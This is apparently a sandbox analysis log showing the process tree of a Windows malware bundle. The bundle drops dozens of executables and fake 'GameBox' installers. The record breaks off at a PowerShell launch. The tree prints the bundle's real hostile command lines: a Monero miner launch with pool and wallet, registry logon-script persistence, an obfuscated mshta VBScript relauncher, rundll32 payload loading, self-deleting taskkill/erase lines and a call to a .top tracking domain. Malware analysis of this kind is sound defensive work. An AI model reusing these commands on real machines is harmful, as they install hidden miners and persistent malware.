  "C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe"
  2⤵
  - Executes dropped EXE
  PID:196
- - C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe
    "C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    PID:4224
- C:\Users\Admin\Documents\VO49JLlC8_Np40dUNpo8MwXg.exe
  "C:\Users\Admin\Documents\VO49JLlC8_Np40dUNpo8MwXg.exe"
  2⤵
  - Executes dropped EXE
  PID:688
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 660
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:932
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 680
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4852
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 720
    3⤵
    - Program crash
    PID:2240
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 728
    3⤵
    - Program crash
    PID:6012
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 1076
    3⤵
    - Program crash
    PID:2240
- C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
  "C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3488
- - C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
    C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4716
- C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe
  "C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe"
  2⤵
  - Executes dropped EXE
  PID:3464
- - C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe
    "C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe" -q
    3⤵
    - Executes dropped EXE
    PID:4896
- C:\Users\Admin\Documents\gd6uGJvHfRYMrGagBQn0wl2K.exe
  "C:\Users\Admin\Documents\gd6uGJvHfRYMrGagBQn0wl2K.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:1452
- C:\Users\Admin\Documents\tFAiejrvGkLA09uKG9VYjzE9.exe
  "C:\Users\Admin\Documents\tFAiejrvGkLA09uKG9VYjzE9.exe"
  2⤵
  - Executes dropped EXE
  PID:2280
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 480
    3⤵
    - Program crash
    PID:5488
- C:\Users\Admin\Documents\0ZvtfMMtmei_r2LUhzD6s3nl.exe
  "C:\Users\Admin\Documents\0ZvtfMMtmei_r2LUhzD6s3nl.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1764
- C:\Users\Admin\Documents\tDNpWE8Ffr9I95g5rfOORzaj.exe
  "C:\Users\Admin\Documents\tDNpWE8Ffr9I95g5rfOORzaj.exe"
  2⤵
  - Executes dropped EXE
  PID:2776
- C:\Users\Admin\Documents\TjiAcqevqaAuG8f2vw40KD72.exe
  "C:\Users\Admin\Documents\TjiAcqevqaAuG8f2vw40KD72.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:1368
- C:\Users\Admin\Documents\RAGsMRiGvQfHKGxdA_XdEHZ4.exe
  "C:\Users\Admin\Documents\RAGsMRiGvQfHKGxdA_XdEHZ4.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- C:\Users\Admin\Documents\Eug40X9J7YAE5ZHuGHmAbQnS.exe
  "C:\Users\Admin\Documents\Eug40X9J7YAE5ZHuGHmAbQnS.exe"
  2⤵
  - Executes dropped EXE
  PID:2192
- - C:\Users\Admin\AppData\Local\Temp\is-TQQ56.tmp\Eug40X9J7YAE5ZHuGHmAbQnS.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-TQQ56.tmp\Eug40X9J7YAE5ZHuGHmAbQnS.tmp" /SL5="$20272,138429,56832,C:\Users\Admin\Documents\Eug40X9J7YAE5ZHuGHmAbQnS.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:4432
  - - C:\Users\Admin\AppData\Local\Temp\is-KGVBQ.tmp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\is-KGVBQ.tmp\Setup.exe" /Verysilent
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      PID:4036
    - - C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
        5⤵
        Executes dropped EXE
        
        PID:4152
      - C:\Users\Admin\AppData\Local\Temp\is-21ATP.tmp\Stats.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-21ATP.tmp\Stats.tmp" /SL5="$10366,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
        6⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\Temp\is-GJOQ2.tmp\builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GJOQ2.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
        7⤵
        
        PID:5840
    - - C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
        5⤵
        Executes dropped EXE
        
        PID:5276
      - C:\Users\Admin\AppData\Local\Temp\is-RUUCK.tmp\WEATHER Manager.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RUUCK.tmp\WEATHER Manager.tmp" /SL5="$1037A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
        6⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\is-5MSVM.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5MSVM.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
        7⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-5MSVM.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-5MSVM.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579447 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
        8⤵
        
        PID:7768
    - - C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
        5⤵
        Executes dropped EXE
        
        PID:5196
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579447 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
        6⤵
        
        PID:4268
    - - C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
        5⤵
        Executes dropped EXE
        
        PID:5148
      - C:\Users\Admin\AppData\Local\Temp\is-IHOQ2.tmp\Inlog.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IHOQ2.tmp\Inlog.tmp" /SL5="$1036C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
        6⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\is-GJOQ1.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GJOQ1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
        7⤵
        
        PID:5868
        
        C:\Users\Admin\AppData\Local\Temp\is-51PLE.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-51PLE.tmp\Setup.tmp" /SL5="$204DA,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-GJOQ1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
        8⤵
        
        PID:6436
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-VQ2KT.tmp\{app}\microsoft.cab -F:* %ProgramData%
        9⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-VQ2KT.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        10⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
        9⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
        10⤵
        
        PID:9780
        
        C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
        9⤵
        
        PID:7148
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
        9⤵
        
        PID:8792
        
        C:\Users\Admin\AppData\Local\Temp\is-VQ2KT.tmp\{app}\vdi_compiler.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-VQ2KT.tmp\{app}\vdi_compiler"
        9⤵
        
        PID:9252
    - - C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
        5⤵
        Executes dropped EXE
        
        PID:4228
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 756
        6⤵
        Program crash
        
        PID:6692
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 780
        6⤵
        Program crash
        
        PID:7116
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 848
        6⤵
        Program crash
        
        PID:6556
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 828
        6⤵
        Program crash
        
        PID:6732
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 952
        6⤵
        Program crash
        
        PID:6184
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 980
        6⤵
        Program crash
        
        PID:3780
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1068
        6⤵
        Program crash
        
        PID:6632
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1340
        6⤵
        Program crash
        
        PID:5952
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1372
        6⤵
        Program crash
        
        PID:2176
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1460
        6⤵
        Program crash
        
        PID:5536
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1532
        6⤵
        Program crash
        
        PID:4768
    - - C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
        5⤵
        
        PID:5376
      - C:\Users\Admin\AppData\Local\Temp\is-3N36K.tmp\VPN.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3N36K.tmp\VPN.tmp" /SL5="$10390,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
        6⤵
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\is-5MSVN.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5MSVN.tmp\Setup.exe" /silent /subid=720
        7⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\is-J80AE.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-J80AE.tmp\Setup.tmp" /SL5="$204E6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-5MSVN.tmp\Setup.exe" /silent /subid=720
        8⤵
        
        PID:6780
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        9⤵
        
        PID:7740
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        10⤵
        
        PID:8312
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        9⤵
        
        PID:8060
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        10⤵
        
        PID:4320
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        9⤵
        
        PID:9832
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        9⤵
        
        PID:9436
    - - C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
        5⤵
        
        PID:5532
      - C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
        6⤵
        
        PID:5636
    - - C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
        5⤵
        
        PID:5644
      - C:\Users\Admin\Documents\fgA4JKXIzDGOq7wKt7mB2zFc.exe
        
        "C:\Users\Admin\Documents\fgA4JKXIzDGOq7wKt7mB2zFc.exe"
        6⤵
        
        PID:6580
        
        C:\Users\Admin\Documents\fgA4JKXIzDGOq7wKt7mB2zFc.exe
        
        "C:\Users\Admin\Documents\fgA4JKXIzDGOq7wKt7mB2zFc.exe"
        7⤵
        
        PID:4248
      - C:\Users\Admin\Documents\WA8F1WDf8ftXykZR_RlO0vnZ.exe
        
        "C:\Users\Admin\Documents\WA8F1WDf8ftXykZR_RlO0vnZ.exe"
        6⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "WA8F1WDf8ftXykZR_RlO0vnZ.exe" /f & erase "C:\Users\Admin\Documents\WA8F1WDf8ftXykZR_RlO0vnZ.exe" & exit
        7⤵
        
        PID:9032
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "WA8F1WDf8ftXykZR_RlO0vnZ.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:8056
      - C:\Users\Admin\Documents\1VfnYcrYnMboO90HFQpC3mYw.exe
        
        "C:\Users\Admin\Documents\1VfnYcrYnMboO90HFQpC3mYw.exe"
        6⤵
        
        PID:7048
      - C:\Users\Admin\Documents\kKFkkMJOiNYM0VuLVWWv1kUd.exe
        
        "C:\Users\Admin\Documents\kKFkkMJOiNYM0VuLVWWv1kUd.exe"
        6⤵
        
        PID:4040
      - C:\Users\Admin\Documents\09FJK8JD6DwB7sZWLzywqXiY.exe
        
        "C:\Users\Admin\Documents\09FJK8JD6DwB7sZWLzywqXiY.exe"
        6⤵
        
        PID:4364
        
        C:\Users\Admin\Documents\09FJK8JD6DwB7sZWLzywqXiY.exe
        
        "C:\Users\Admin\Documents\09FJK8JD6DwB7sZWLzywqXiY.exe"
        7⤵
        
        PID:5144
      - C:\Users\Admin\Documents\cKBMAmgaIJbkMbMdhPpVwvPW.exe
        
        "C:\Users\Admin\Documents\cKBMAmgaIJbkMbMdhPpVwvPW.exe"
        6⤵
        
        PID:7212
      - C:\Users\Admin\Documents\FNW4Yvj_kNRnzaGOtQ8y0RNV.exe
        
        "C:\Users\Admin\Documents\FNW4Yvj_kNRnzaGOtQ8y0RNV.exe"
        6⤵
        
        PID:7204
        
        C:\Users\Admin\AppData\Roaming\3088890.exe
        
        "C:\Users\Admin\AppData\Roaming\3088890.exe"
        7⤵
        
        PID:9160
        
        C:\Users\Admin\AppData\Roaming\2198638.exe
        
        "C:\Users\Admin\AppData\Roaming\2198638.exe"
        7⤵
        
        PID:7376
        
        C:\Users\Admin\AppData\Roaming\1387634.exe
        
        "C:\Users\Admin\AppData\Roaming\1387634.exe"
        7⤵
        
        PID:9152
        
        C:\Users\Admin\AppData\Roaming\3647379.exe
        
        "C:\Users\Admin\AppData\Roaming\3647379.exe"
        7⤵
        
        PID:8240
      - C:\Users\Admin\Documents\grAIWOV3nTogliJhW2o5MuSQ.exe
        
        "C:\Users\Admin\Documents\grAIWOV3nTogliJhW2o5MuSQ.exe"
        6⤵
        
        PID:7192
        
        C:\Users\Admin\Documents\grAIWOV3nTogliJhW2o5MuSQ.exe
        
        "C:\Users\Admin\Documents\grAIWOV3nTogliJhW2o5MuSQ.exe"
        7⤵
        
        PID:8664
      - C:\Users\Admin\Documents\_jUolkY6ncD0nuEtnJ0O3fbQ.exe
        
        "C:\Users\Admin\Documents\_jUolkY6ncD0nuEtnJ0O3fbQ.exe"
        6⤵
        
        PID:7180
      - C:\Users\Admin\Documents\eCdU2CBgAPLZvtvjiPvgFnwZ.exe
        
        "C:\Users\Admin\Documents\eCdU2CBgAPLZvtvjiPvgFnwZ.exe"
        6⤵
        
        PID:6496
      - C:\Users\Admin\Documents\bp1C_8RDWMe1H_cvVKmUj2Yp.exe
        
        "C:\Users\Admin\Documents\bp1C_8RDWMe1H_cvVKmUj2Yp.exe"
        6⤵
        
        PID:4376
      - C:\Users\Admin\Documents\0IQgDBXEv6MdBElqMp2TZRWO.exe
        
        "C:\Users\Admin\Documents\0IQgDBXEv6MdBElqMp2TZRWO.exe"
        6⤵
        
        PID:7112
      - C:\Users\Admin\Documents\7a1R5FdNa6VshDtG5XIrnFQe.exe
        
        "C:\Users\Admin\Documents\7a1R5FdNa6VshDtG5XIrnFQe.exe"
        6⤵
        
        PID:1220
      - C:\Users\Admin\Documents\TnzXqBnBkk_P79wuPuyzGv3o.exe
        
        "C:\Users\Admin\Documents\TnzXqBnBkk_P79wuPuyzGv3o.exe"
        6⤵
        
        PID:5144
        
        C:\Users\Admin\Documents\TnzXqBnBkk_P79wuPuyzGv3o.exe
        
        C:\Users\Admin\Documents\TnzXqBnBkk_P79wuPuyzGv3o.exe
        7⤵
        
        PID:8048
      - C:\Users\Admin\Documents\euYApBRkQx8HCioFjTHPaD7W.exe
        
        "C:\Users\Admin\Documents\euYApBRkQx8HCioFjTHPaD7W.exe"
        6⤵
        
        PID:5980
      - C:\Users\Admin\Documents\ZMGoF8vqfBYtWMov9lBHhgDw.exe
        
        "C:\Users\Admin\Documents\ZMGoF8vqfBYtWMov9lBHhgDw.exe"
        6⤵
        
        PID:7240
      - C:\Users\Admin\Documents\_X5swROimyjF1LHym3BjSmtw.exe
        
        "C:\Users\Admin\Documents\_X5swROimyjF1LHym3BjSmtw.exe"
        6⤵
        
        PID:7416
        
        C:\Users\Admin\Documents\_X5swROimyjF1LHym3BjSmtw.exe
        
        C:\Users\Admin\Documents\_X5swROimyjF1LHym3BjSmtw.exe
        7⤵
        
        PID:5532
      - C:\Users\Admin\Documents\1ZmFi4ZMAzNe_cY149MqKluR.exe
        
        "C:\Users\Admin\Documents\1ZmFi4ZMAzNe_cY149MqKluR.exe"
        6⤵
        
        PID:7408
      - C:\Users\Admin\Documents\25BPJtJvcTXwjDVhkNSxOW0r.exe
        
        "C:\Users\Admin\Documents\25BPJtJvcTXwjDVhkNSxOW0r.exe"
        6⤵
        
        PID:7400
      - C:\Users\Admin\Documents\Z2l91qXofFsJ_cTzos54sHcF.exe
        
        "C:\Users\Admin\Documents\Z2l91qXofFsJ_cTzos54sHcF.exe"
        6⤵
        
        PID:7392
      - C:\Users\Admin\Documents\QtHt1xjUR6Mj_Qv_0MB1Q5rz.exe
        
        "C:\Users\Admin\Documents\QtHt1xjUR6Mj_Qv_0MB1Q5rz.exe"
        6⤵
        
        PID:6808
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\QtHt1xjUR6Mj_Qv_0MB1Q5rz.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\QtHt1xjUR6Mj_Qv_0MB1Q5rz.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
        7⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\QtHt1xjUR6Mj_Qv_0MB1Q5rz.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\QtHt1xjUR6Mj_Qv_0MB1Q5rz.exe") do taskkill -IM "%~nXW" -f
        8⤵
        
        PID:3620
        
        C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
        
        WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
        9⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
        10⤵
        
        PID:8456
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f
        11⤵
        
        PID:8608
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
        10⤵
        
        PID:8216
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -IM "QtHt1xjUR6Mj_Qv_0MB1Q5rz.exe" -f
        9⤵
        Kills process with taskkill
        
        PID:8336
      - C:\Users\Admin\Documents\Kr19B4qmSDRQFaBwaRPwssPB.exe
        
        "C:\Users\Admin\Documents\Kr19B4qmSDRQFaBwaRPwssPB.exe"
        6⤵
        
        PID:6868
        
        C:\Users\Admin\AppData\Local\Temp\is-VK3TG.tmp\Kr19B4qmSDRQFaBwaRPwssPB.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-VK3TG.tmp\Kr19B4qmSDRQFaBwaRPwssPB.tmp" /SL5="$2046E,138429,56832,C:\Users\Admin\Documents\Kr19B4qmSDRQFaBwaRPwssPB.exe"
        7⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\is-P8DCE.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-P8DCE.tmp\Setup.exe" /Verysilent
        8⤵
        
        PID:7208
        
        C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
        9⤵
        
        PID:3936
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579447 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
        10⤵
        
        PID:5964
      - C:\Users\Admin\Documents\z5nwEY_NEtGnbJqjFrCbxJM6.exe
        
        "C:\Users\Admin\Documents\z5nwEY_NEtGnbJqjFrCbxJM6.exe"
        6⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "z5nwEY_NEtGnbJqjFrCbxJM6.exe" /f & erase "C:\Users\Admin\Documents\z5nwEY_NEtGnbJqjFrCbxJM6.exe" & exit
        7⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "z5nwEY_NEtGnbJqjFrCbxJM6.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:5808
      - C:\Users\Admin\Documents\74b72iCcPTenq2YP83LEGwZ4.exe
        
        "C:\Users\Admin\Documents\74b72iCcPTenq2YP83LEGwZ4.exe"
        6⤵
        
        PID:4580
        
        C:\Users\Admin\Documents\74b72iCcPTenq2YP83LEGwZ4.exe
        
        "C:\Users\Admin\Documents\74b72iCcPTenq2YP83LEGwZ4.exe" -q
        7⤵
        
        PID:8208
      - C:\Users\Admin\Documents\29cTUhTEN1cQpSBsjH8tQdvR.exe
        
        "C:\Users\Admin\Documents\29cTUhTEN1cQpSBsjH8tQdvR.exe"
        6⤵
        
        PID:6676
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\29CTUH~1.DLL,s C:\Users\Admin\DOCUME~1\29CTUH~1.EXE
        7⤵
        
        PID:1364
        
        C:\Windows\SysWOW64\RUNDLL32.EXE
        
        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\29CTUH~1.DLL,fCpSa1dCcVI=
        8⤵
        
        PID:10684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
